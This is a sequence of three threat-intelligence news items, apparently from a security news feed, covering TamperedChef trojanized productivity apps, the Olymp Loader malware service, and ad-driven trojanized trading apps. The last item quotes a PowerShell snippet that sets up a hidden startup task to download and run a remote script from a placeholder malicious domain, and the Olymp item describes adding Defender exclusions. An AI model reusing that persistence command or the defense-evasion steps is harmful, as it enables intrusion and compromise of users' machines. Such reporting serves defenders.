A sophisticated malware campaign has emerged that weaponizes seemingly legitimate productivity tools to infiltrate systems and steal sensitive information.

The TamperedChef malware represents a concerning evolution in threat actor tactics, utilizing trojanized applications disguised as calendar tools and image viewers to bypass traditional security defenses.

This campaign demonstrates how cybercriminals increasingly exploit user trust in digitally signed software to facilitate initial access and establish persistent footholds within targeted environments.

The malware campaign centers around two primary applications: Calendaromatic.exe and ImageLooker.exe, both masquerading as benign productivity software while harboring malicious capabilities.

These applications are distributed through self-extracting 7-Zip archives that exploit CVE-2025-0411 to evade Windows’ Mark of the Web protections, allowing them to execute without triggering SmartScreen warnings or other reputation-based security controls.

The campaign leverages deceptive advertising and search engine optimization techniques to direct victims toward malicious downloads, often targeting users searching for free productivity utilities.

Field Effect analysts identified the campaign on September 22, 2025, during routine analysis of a potentially unwanted application flagged by Microsoft Defender.

Their investigation revealed a broader distribution network involving multiple suspicious signing publishers and command-and-control infrastructure.

The researchers discovered that both malicious applications were digitally signed by entities including CROWN SKY LLC and LIMITED LIABILITY COMPANY APPSOLUTE, providing a veneer of legitimacy that helps bypass user suspicion and endpoint defenses.

The malware’s impact extends beyond simple data theft, as it establishes comprehensive system compromise through browser hijacking, credential harvesting, and persistent backdoor access.

TamperedChef demonstrates particular sophistication in its ability to exfiltrate browser-stored credentials and session information while simultaneously redirecting web traffic and altering browser settings to facilitate ongoing malicious activities.

Advanced Evasion Through Unicode Encoding and Framework Exploitation

The TamperedChef campaign showcases remarkable technical sophistication through its exploitation of modern application frameworks and advanced encoding techniques.

Both Calendaromatic.exe and ImageLooker.exe are built using NeutralinoJS, a lightweight desktop framework that enables the execution of arbitrary JavaScript code within native applications.

This framework choice allows the malware to seamlessly interact with system APIs while maintaining the appearance of legitimate desktop software.

The malware employs Unicode homoglyphs as a primary evasion mechanism, encoding malicious payloads within seemingly benign API responses.

This technique enables the malware to bypass traditional string-based detection systems and signature matching algorithms that security products rely upon for identification.

When executed, the malware decodes these hidden payloads and executes them through the NeutralinoJS runtime, effectively creating a covert execution channel that operates beneath the radar of conventional monitoring systems.

Persistence mechanisms include the creation of scheduled tasks and registry modifications using specific command-line flags such as --install, --enableupdate, and --fullupdate.

Upon successful installation, the malware establishes immediate communication with command-and-control servers including calendaromatic[.]com and movementxview[.]com, enabling remote operators to issue commands and exfiltrate collected data.

The network communication occurs through encrypted channels that further complicate detection and analysis efforts by security teams.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New TamperedChef Malware Leverages Productivity Tools to Gain Access and Exfiltrate Sensitive Data appeared first on Cyber Security News.

The cybersecurity community is currently observing a surge in interest around Olymp Loader, a recently unveiled Malware-as-a-Service (MaaS) platform written entirely in Assembly.

First advertised on underground forums and Telegram channels in early June 2025, Olymp Loader has rapidly evolved from a rudimentary botnet concept into a sophisticated loader and crypter suite.

Its author, operating under the alias OLYMPO, touts the service as Fully UnDetectable (FUD), claiming that its advanced design can bypass modern antivirus engines and evade machine-learning–based heuristics.

Early adopters praise its modular architecture, which integrates credential stealers, crypters, and privilege escalation mechanisms.

Research indicates that the threat actor behind OLYMPO is a small team with extensive Assembly programming expertise.

As reported on HackForums and other underground venues, they have implemented features such as deep XOR encryption for payload modules, UAC‐Flood privilege escalation, and automatic Windows Defender exclusions.

On August 5, 2025, OLYMPO announced pricing tiers ranging from a basic stub at USD 50 to a fully customized injection service at USD 200, with all packages including a “Defender-way” bypass, Defender-removal module, and automatic certificate signing to lend samples a veneer of legitimacy.

Outpost24 analysts identified multiple instances of Olymp Loader in the wild, often masquerading as legitimate software.

For example, binaries named NodeJs[.]exe were distributed via GitHub Releases under the repository PurpleOrchid65Testing, exploiting developer trust in Node.js executables.

In other cases, the loader was delivered as fake installers for OpenSSL, Zoom, PuTTY, and CapCut, even borrowing official icons and certificates from known applications to trick victims.

Infection Mechanism and Persistence

Upon execution, Olymp Loader initiates a multi‐stage process to establish persistence and disable defenses.

Initial samples observed in June employed a simple batch script: copying the executable to the user’s AppData directory and spawning a cmd[.]exe process to run a timeout command, followed by re‐execution from the new location.

A PowerShell script was then launched to create an entry in the StartUp folder, ensuring the loader runs on each system boot.

By early August, this workflow was augmented with a Defender Remover module, publicly available on GitHub, which executes PowerRun[.]exe and a RemoveSecHealthApp[.]ps1 script to terminate Defender services before adding exhaustive exclusion paths (APPDATA, LOCALAPPDATA, Desktop, StartMenu, and more) via Add-MpPreference.

The loader’s shellcode component leverages the LoadPE method for code‐cave–based injection into legitimate processes, supporting 32‐bit, 64‐bit, .NET, and Java payloads.

Unique shellcode initialization routines further obfuscate the loader’s purpose, while a custom certificate signing feature signs both the stub and modules, complicating detection by reputation‐based systems.

This combination of script‐based persistence, injection techniques, and automatic certificate signing marks a significant advancement in MaaS offerings, lowering the entry barrier for mid‐level cybercriminals and amplifying attack volumes across enterprises and developers alike.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New Malware-as-a-Service Olymp Loader Promises Defender-Bypass With Automatic Certificate Signing appeared first on Cyber Security News.

In recent months, cybersecurity teams have observed an alarming trend in which malicious actors exploit Facebook and Google advertising channels to masquerade as legitimate financial services.

By promoting free or premium access to well-known trading platforms, these threat actors have successfully lured unsuspecting users into downloading trojanized applications.

The campaign’s social engineering tactics leverage familiar branding and verified badges, creating a veneer of authenticity that bypasses casual scrutiny.

Victims are redirected through paid ad placements toward obfuscated payloads designed to evade automated analysis and human review.

Initial infections typically begin with clicks on Facebook Ads promising “one-year free access” to premium charting tools.

Users are directed to landing pages that host customized service worker scripts, often encrypted with AES-CBC and loaded via StreamSaver.js to deliver a malicious installer under the guise of a legitimate executable.

Once downloaded, the oversized loader—sometimes over 700 MB—employs anti-sandbox checks, preventing execution in virtualized environments. Only upon passing these defenses does the downloader initiate its multi-stage process.

Bitdefender analysts noted that after breaching these initial defenses, the malware shifts to a WebSocket communication channel on port 30000, replacing the older HTTP-based approach used in previous campaigns.

The threat actors encrypted their front-end JavaScript, then deployed a deobfuscation routine at runtime to construct the final payload.

This dynamic approach foils most static analysis tools and significantly increases the complexity of forensic investigations.

A successful execution triggers the creation of a persistent Scheduled Task named EdgeResourcesInstallerV12-issg, which downloads and executes subsequent PowerShell scripts via Invoke-Expression.

This task not only ensures reinfection on system restart but also modifies Windows Defender settings to exclude its payload directories.

The following excerpt illustrates the Scheduled Task registration:-

$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "Invoke-Expression $(Invoke-WebRequest -UseBasicParsing https://malicious-domain.com/next.ps1)"'
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'EdgeResourcesInstallerV12-issg' -Description 'Windows Edge resources updater'

Infection Mechanism

The infection mechanism centers on a sophisticated downloader component that leverages both service worker APIs and modern web tracking frameworks to blend malicious operations with legitimate analytics.

By integrating PostHog for event tracking alongside third-party pixels such as Facebook Pixel, Google Ads Conversion Tracking, and Microsoft Ads Pixel, the front-end application gains visibility into user behavior.

This telemetry allows operators to selectively deploy malicious content only to high-value targets, serving benign pages to all others.

Once the user initiates a download, the service worker intercepts the request, decrypts and deobfuscates the payload, then streams the binary through StreamSaver.js to the file system—bypassing traditional browser download safeguards.

This seamless delivery mechanism, paired with domain rotation and language-specific ads, enables rapid, widespread propagation while maintaining a low profile.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Threat Actors Weaponizing Facebook and Google Ads as Financial Platforms to Steal Sensitive Data appeared first on Cyber Security News.